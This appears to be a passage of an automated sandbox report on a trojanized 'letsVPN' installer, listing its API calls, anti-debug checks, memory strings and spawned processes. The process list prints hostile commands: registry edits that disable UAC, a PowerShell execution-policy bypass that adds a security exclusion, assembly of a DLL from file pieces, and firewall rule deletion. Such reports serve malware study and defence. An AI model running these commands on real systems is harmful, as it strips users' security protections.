              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT UUID FROM Win32_ComputerSystemProduct
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_ComputerSystemProduct
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorID From Win32_processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select ProcessorId From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Manufacturer From Win32_Processor
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
              Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeLast function: Thread delayed
              Source: C:\ProgramData\letsvpn-latest.exeFile Volume queried: C:\Program Files (x86) FullSizeInformation
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FEB97 _wstat64,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,free,_wsopen_s,__fstat64,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,19_2_6D0FEB97
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FC41C _mbsdec,_mbscmp,_mbscmp,_strdup,strlen,_calloc_crt,__cftof,strcpy_s,_mbsicmp,_invoke_watson,_malloc_crt,FindClose,FindFirstFileExW,FindNextFileW,FindClose,19_2_6D0FC41C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FE748 _wstat32,__doserrno,_errno,_invalid_parameter_noinfo,_wcspbrk,_errno,__doserrno,towlower,_getdrive,FindFirstFileExW,_wcspbrk,wcslen,GetDriveTypeW,free,___loctotime32_t,free,_wsopen_s,__fstat32,_close,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,___loctotime32_t,FindClose,_errno,GetLastError,__dosmaperr,FindClose,GetLastError,__dosmaperr,FindClose,19_2_6D0FE748
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FC385 _malloc_crt,FindClose,FindFirstFileExA,FindNextFileA,FindClose,19_2_6D0FC385
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D095C91 _wstat64i32,_wcspbrk,towlower,FindFirstFileExW,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FileTimeToSystemTime,SystemTimeToTzSpecificLocalTime,FindClose,_getdrive,GetLastError,GetLastError,_wcspbrk,wcslen,_errno,__doserrno,__doserrno,_errno,_invalid_parameter_noinfo,GetDriveTypeW,free,free,_wsopen_s,__fstat64i32,_close,_errno,__dosmaperr,FindClose,__dosmaperr,FindClose,19_2_6D095C91
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FDCF7 _wfindfirst64i32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FDCF7
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FDF35 _wfindfirst32i64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FDF35
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FD86F _wfindfirst32,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FD86F
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0FDA9B _wfindfirst64,_errno,_invalid_parameter_noinfo,FindFirstFileExW,GetLastError,_errno,_errno,_errno,___time64_t_from_ft,___time64_t_from_ft,___time64_t_from_ft,wcscpy_s,_invoke_watson,19_2_6D0FDA9B
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_00405C4D GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,21_2_00405C4D
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_0040689E FindFirstFileW,FindClose,21_2_0040689E
              Source: C:\ProgramData\letsvpn-latest.exeCode function: 21_2_00402930 FindFirstFileW,21_2_00402930
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF7961971EC GetWindowsDirectoryW,FindFirstFileW,__iob_func,__iob_func,__iob_func,FindNextFileW,FindClose,33_2_00007FF7961971EC
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00684318 __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindClose,std::ios_base::_Ios_base_dtor,58_2_00684318
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00695490 FindFirstFileExW,58_2_00695490
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180006940 GetSystemInfo,GlobalMemoryStatusEx,0_2_0000000180006940
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 922337203685477
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeThread delayed: delay time: 300000
              Source: sinaplayer_service.exe, 00000013.00000002.3389075386.00000000005AE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllp.^l
              Source: LetsPRO.exe, 0000003D.00000002.3395428987.0000000002A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Remove-NetEventVmNetworkAdapter
              Source: LetsPRO.exe, 0000003D.00000002.3450337246.000000005B891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Dynamic Memory Integration Service
              Source: svchost.exe, 00000028.00000003.2652483472.00000273EF317000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: @ethernetwlanppipvmnetextension93}
              Source: LetsPRO.exe, 0000003D.00000002.3395428987.0000000002A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Add-NetEventVmNetworkAdapter
              Source: svchost.exe, 00000028.00000003.2652358540.00000273EF322000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: (@vmnetextension
              Source: LetsPRO.exe, 0000003D.00000002.3450337246.000000005B891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: AlDHyper-V Virtual Machine Bus Pipes;
              Source: LetsPRO.exe, 0000003D.00000002.3450337246.000000005B891000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: sWDHyper-V Hypervisor Root Partition
              Source: LetsPRO.exe, 0000003D.00000002.3413852578.000000000525F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V dksecwoqydufhai Bus
              Source: svchost.exe, 0000000D.00000002.3392811758.0000020B52E2B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 0000000D.00000002.3395633467.0000020B58458000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: LetsPRO.exe, 0000003D.00000002.3395428987.0000000002A3E000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Get-NetEventVmNetworkAdapter
              Source: netsh.exe, 0000002D.00000003.2672378207.0000000003231000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
              Source: letsvpn-latest.exe, 00000015.00000003.2439963735.000000000310A000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VirtualMachine
              Source: C:\Users\user\Desktop\letsVPN.exeAPI call chain: ExitProcess graph end nodegraph_0-18100
              Source: C:\Users\user\Desktop\letsVPN.exeAPI call chain: ExitProcess graph end nodegraph_0-16580
              Source: C:\Users\user\Desktop\letsVPN.exeAPI call chain: ExitProcess graph end nodegraph_0-18090
              Source: C:\ProgramData\letsvpn-latest.exeAPI call chain: ExitProcess graph end node
              Source: C:\ProgramData\letsvpn-latest.exeProcess information queried: ProcessInformation
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180016BCF __crtCaptureCurrentContext,IsDebuggerPresent,0_2_0000000180016BCF
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018000DDF0 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_000000018000DDF0
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D1208AC VirtualProtect ?,-00000001,00000104,?,?,?,0000001C19_2_6D1208AC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800057CD LoadLibraryW,GetProcAddress,ShellExecuteW,LoadLibraryW,GetProcAddress,Sleep,SleepEx,DeleteFileW,CreateDirectoryW,Sleep,SleepEx,Sleep,SleepEx,ShellExecuteW,Sleep,SleepEx,Sleep,SleepEx,DeleteFileW,DeleteFileW,DeleteFileW,std::ios_base::_Ios_base_dtor,0_2_00000001800057CD
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00695217 mov eax, dword ptr fs:[00000030h]58_2_00695217
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_0068EDE2 mov eax, dword ptr fs:[00000030h]58_2_0068EDE2
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_00000001800278D5 _errno,_setmode_nolock,GetProcessHeap,HeapFree,_lseeki64_nolock,0_2_00000001800278D5
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeProcess token adjusted: Debug
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess token adjusted: Debug
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018002A280 ExitThread,SetUnhandledExceptionFilter,0_2_000000018002A280
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018002A2A0 RtlLookupFunctionEntry,SetUnhandledExceptionFilter,0_2_000000018002A2A0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018002A2C8 RtlCaptureContext,SetUnhandledExceptionFilter,0_2_000000018002A2C8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_000000018002A2E0 SetUnhandledExceptionFilter,0_2_000000018002A2E0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: 0_2_0000000180027F26 IsProcessorFeaturePresent,IsProcessorFeaturePresent,SetUnhandledExceptionFilter,0_2_0000000180027F26
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00537D98 ?terminate@@YAXXZ,__crtSetUnhandledExceptionFilter,19_2_00537D98
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D12480C __crtUnhandledException,SetUnhandledExceptionFilter,UnhandledExceptionFilter,19_2_6D12480C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_6D0AC7DB __crtSetUnhandledExceptionFilter,SetUnhandledExceptionFilter,19_2_6D0AC7DB
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF796197680 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,33_2_00007FF796197680
              Source: C:\Program Files (x86)\letsvpn\driver\tapinstall.exeCode function: 33_2_00007FF796197798 SetUnhandledExceptionFilter,33_2_00007FF796197798
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00688A28 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,58_2_00688A28
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_0068DAD2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_0068DAD2
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00688E32 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,58_2_00688E32
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeCode function: 58_2_00688FC5 SetUnhandledExceptionFilter,58_2_00688FC5
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeMemory allocated: page read and write | page guard

              HIPS / PFW / Operating System Protection Evasion

              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\netsh.exe "C:\Windows\System32\netsh.exe" exec C:\ProgramData\s1qGS.xml
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Roaming\06VAP.bat"
              Source: C:\Users\user\Desktop\letsVPN.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /b C:\ProgramData\Jm42a\Q4nO1~16\s+C:\ProgramData\Jm42a\Q4nO1~16\a C:\ProgramData\Jm42a\Q4nO1~16\base.dll
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ipconfig.exe ipconfig /all
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v ConsentPromptBehaviorAdmin /t reg_dword /d 0 /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t reg_dword /d 0 /F
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\reg.exe reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v PromptOnSecureDesktop /t reg_dword /d 0 /F
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe "C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exe"
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ipconfig /all
              Source: C:\Windows\System32\mmc.exeProcess created: C:\ProgramData\letsvpn-latest.exe "C:\ProgramData\letsvpn-latest.exe"
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -inputformat none -ExecutionPolicy Bypass -File "C:\Program Files (x86)\letsvpn\AddWindowsSecurityExclusion.ps1"
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" install "C:\Program Files (x86)\letsvpn\driver\OemVista.inf" tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Program Files (x86)\letsvpn\driver\tapinstall.exe "C:\Program Files (x86)\letsvpn\driver\tapinstall.exe" findall tap0901
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\ProgramData\letsvpn-latest.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=lets.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO.exe
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsPRO
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\netsh.exe netsh advfirewall firewall Delete rule name=LetsVPN
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe" checkNetFramework
              Source: C:\Program Files (x86)\letsvpn\LetsPRO.exeProcess created: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe "C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exe"
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C ipconfig /all
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C route print
              Source: C:\Program Files (x86)\letsvpn\app-3.12.0\LetsPRO.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C arp -a
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ipconfig.exe ipconfig /all
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ROUTE.EXE route print
              Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\ARP.EXE arp -a
              Source: letsvpn-latest.exe, 00000015.00000003.2351020724.0000000003102000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: LetsPRO.exe, 0000003D.00000002.3422609908.000000000EDCA000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SetProgmanWindow
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: 19_2_00525EA0 cpuid 19_2_00525EA0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,_getptd,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,TranslateName,GetLcidFromLangCountry,GetLcidFromLanguage,_getptd,EnumSystemLocalesW,GetUserDefaultLCID,ProcessCodePage,IsValidCodePage,IsValidLocale,__crtDownlevelLCIDToLocaleName,__crtDownlevelLCIDToLocaleName,GetLocaleInfoW,GetLocaleInfoW,_itow_s,0_2_0000000180023FF8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,TestDefaultCountry,__crtGetLocaleInfoEx,TestDefaultCountry,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_invoke_watson,_getptd,__crtGetLocaleInfoEx,_invoke_watson,0_2_0000000180023040
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,WideCharToMultiByte,free,0_2_000000018001E840
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __getlocaleinfo,_calloc_crt,_calloc_crt,_calloc_crt,_calloc_crt,GetCPInfo,__crtLCMapStringA,__crtLCMapStringA,__crtGetStringTypeA,free,free,free,free,free,free,free,free,free,0_2_00000001800148B8
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_000000018001E9AC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,EnumSystemLocalesW,0_2_00000001800239DC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,0_2_0000000180022280
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,EnumSystemLocalesW,0_2_0000000180023A90
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _calloc_crt,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,free,free,free,0_2_0000000180021B1C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,TestDefaultLanguage,0_2_0000000180023B24
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,0_2_00000001800234AC
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: EnumSystemLocalesW,0_2_000000018001650C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtDownlevelLocaleNameToLCID,GetLocaleInfoW,0_2_0000000180016550
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,_getptd,LcidFromHexString,GetLocaleInfoW,TestDefaultLanguage,0_2_0000000180023D54
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoEx,0_2_0000000180023560
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _calloc_crt,free,free,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,__getlocaleinfo,free,free,free,free,0_2_00000001800215B0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,TranslateName,GetLocaleNameFromLangCountry,GetLocaleNameFromLanguage,TranslateName,GetLocaleNameFromLangCountry,ProcessCodePage,IsValidCodePage,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,_itow_s,GetLocaleNameFromLanguage,__crtGetUserDefaultLocaleName,_invoke_watson,_invoke_watson,_getptd,_getptd,LcidFromHexString,GetLocaleInfoW,0_2_0000000180023664
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_0000000180023EA0
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: __crtGetLocaleInfoA,GetLastError,__crtGetLocaleInfoA,_calloc_crt,__crtGetLocaleInfoA,_calloc_crt,free,free,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,free,__crtGetLocaleInfoEx,_invoke_watson,0_2_000000018001674C
              Source: C:\Users\user\Desktop\letsVPN.exeCode function: _getptd,GetLocaleInfoW,0_2_0000000180023F50
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,GetLocaleInfoW,19_2_6D0A0F41
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: GetLocaleInfoW,_errno,_invalid_parameter_noinfo,_errno,_errno,_errno,_invalid_parameter_noinfo,19_2_6D09CADD
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,_wcsicmp,_wcsnicmp,_TestDefaultCountry,wcslen,wcsncpy_s,_getptd,__crtGetLocaleInfoEx,_wcsicmp,__crtGetLocaleInfoEx,_wcsicmp,wcslen,wcsncpy_s,wcslen,_TestDefaultCountry,wcslen,_invoke_watson,__crtGetLocaleInfoEx,19_2_6D0A8579
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,wcsncmp,19_2_6D0A845E
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: __crtEnumSystemLocalesEx,EnumSystemLocalesW,19_2_6D0A8660
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: wcslen,wcslen,__crtEnumSystemLocalesEx,19_2_6D0A8683
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,IsValidCodePage,wcslen,wcsncpy_s,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,wcschr,wcschr,_itow_s,_GetLocaleNameFromLanguage,_GetLocaleNameFromLanguage,__crtGetLocaleInfoEx,_invoke_watson,19_2_6D0A8036
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: wcscmp,wcscmp,_wtol,__crtGetLocaleInfoEx,__crtGetLocaleInfoEx,GetACP,19_2_6D0A7FE9
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: wcscmp,wcscmp,GetLocaleInfoW,_wtol,GetLocaleInfoW,GetACP,19_2_6D12996B
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,_getptd,_LcidFromHexString,GetLocaleInfoW,_wcsicmp,_wcsicmp,_TestDefaultLanguage,19_2_6D129841
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,free,_calloc_crt,strncpy_s,__crtGetLocaleInfoEx,_calloc_crt,__crtGetLocaleInfoEx,GetLastError,_calloc_crt,free,free,_invoke_watson,_malloc_crt,memcpy,_siglookup,19_2_6D0A1BFC
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: _getptd,GetLocaleInfoW,_GetPrimaryLen,wcslen,19_2_6D129A2C
              Source: C:\ProgramData\Jm42a\Q4nO1~16\sinaplayer_service.exeCode function: __crtGetLocaleInfoEx,__crtGetLocaleInfoEx,WideCharToMultiByte,_freea_s,malloc,19_2_6D0A1A74
